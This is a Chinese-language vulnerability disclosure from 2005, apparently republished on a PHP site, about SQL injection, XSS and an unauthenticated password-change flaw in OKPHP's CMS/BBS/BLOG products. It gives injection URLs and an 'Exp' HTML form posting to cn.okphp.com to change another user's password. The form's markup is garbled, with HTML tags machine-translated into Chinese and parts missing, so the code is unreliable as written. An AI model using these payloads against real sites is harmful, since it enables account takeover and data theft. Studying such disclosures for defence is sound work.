首页  >  文章  >  后端开发  >  okphp系列产品的多个漏洞_PHP

okphp系列产品的多个漏洞_PHP

WBOY
WBOY原创
2016-06-01 12:25:321145浏览

本文作者:SuperHei
文章性质:原创
发布日期:2005-08-14

程序描叙

  OKPHP是由www.okphp.com开发一套专业的网站管理系统,目前产品包括:Okphp CMS, Okphp BBS,Okphp BLOG。由于对变量的过滤不严密及密码认证不严,导致sql注射,xss,隐藏变量post攻击从跨权限操作。

漏洞攻击

1、SQl注射及xss

  “几乎” 存在于各个变量里,如:forum.php

http://www.xxx.com/forum.php?action=view_forum&forum_id={sql}
http://cn.okphp.com/forum.php?action=view_forum&forum_id='xss
.......

2、隐藏变量post攻击

  在提交request.php?action=user_modify 修改用户资料时,没有密码认证导致通过user_id修改容易用户密码及资料;

Exp:



Okphp 讨论 - 由 okphp BBS 提供支持





<表单名称="form1" method="post" action="http://cn.okphp.com/forum.php" enctype="multipart/form-data">

























< ;td width="80%" height="2">

;





修改信息
密码



重复输入


头像地址


<输入类型="text" name="headpic" size="80" value="http://cn.okphp.com/bbs/ images/headp/836.gif">


宽度

px,长度

px (最大限制:100px)



<输入类型="文件" name="upfile">
电子邮件

签名




用户简介

< input type="hidden" name="action" value="user_modify">






解决办法

1、加强对阀门过滤
2、增加密码认证

声明:
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn